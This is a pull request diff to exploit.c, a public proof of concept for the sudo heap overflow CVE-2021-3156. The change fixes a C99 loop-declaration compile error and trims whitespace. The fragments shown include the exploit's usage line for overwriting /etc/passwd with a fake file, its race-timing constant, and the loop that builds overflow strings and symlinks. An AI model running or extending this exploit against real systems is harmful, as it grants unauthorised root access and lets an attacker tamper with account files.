### PR TITLE
Fix GCC error: 'for' loop initial declaration used outside C99 mode

### DIFF
--- a/exploit.c
+++ b/exploit.c
@@ -20,8 +20,8 @@
 #include <fcntl.h>
 #include <pwd.h>
 
-// !!! best value of this varies from system-to-system !!! 
-// !!! you will probably need to tune this !!! 
+// !!! best value of this varies from system-to-system !!!
+// !!! you will probably need to tune this !!!
 #define RACE_SLEEP_TIME 10000
 
 char *target_file;
@@ -61,7 +61,7 @@ int main(int my_argc, char **my_argv)
 {
     puts("CVE-2021-3156 PoC by @gf_256");
     puts("original advisory by Baron Samedit");
-    
+
     if (my_argc != 3) {
         puts("./meme <target file> <src file>");
         puts("Example: ./meme /etc/passwd my_fake_passwd_file");
@@ -101,13 +101,13 @@ int main(int my_argc, char **my_argv)
     };
 
     puts("ok podracing time bitches");
-
-    for (int i = 0; i < 5000; i++) {
+    int i;
+    for (i = 0; i < 5000; i++) {
         sprintf(memedir, "ayylmaobigchungussssssssssss00000000000000000000000000%08d", i);
         sprintf(overflow, "11111111111111111111111111111111111111111111111111111111%s", memedir);
         sprintf(my_symlink, "%s/%s", memedir, myusername);
         puts(memedir);
-        
+
         if (access(memedir, F_OK) == 0) {
             printf("dude, %s already exists, do it from a clean working dir\n", memedir);
             return 1;


### PR DESCRIPTION
Some systems don't handle the int declaration inside the loop and this breaks the compiler. 
This small fix resolves that. 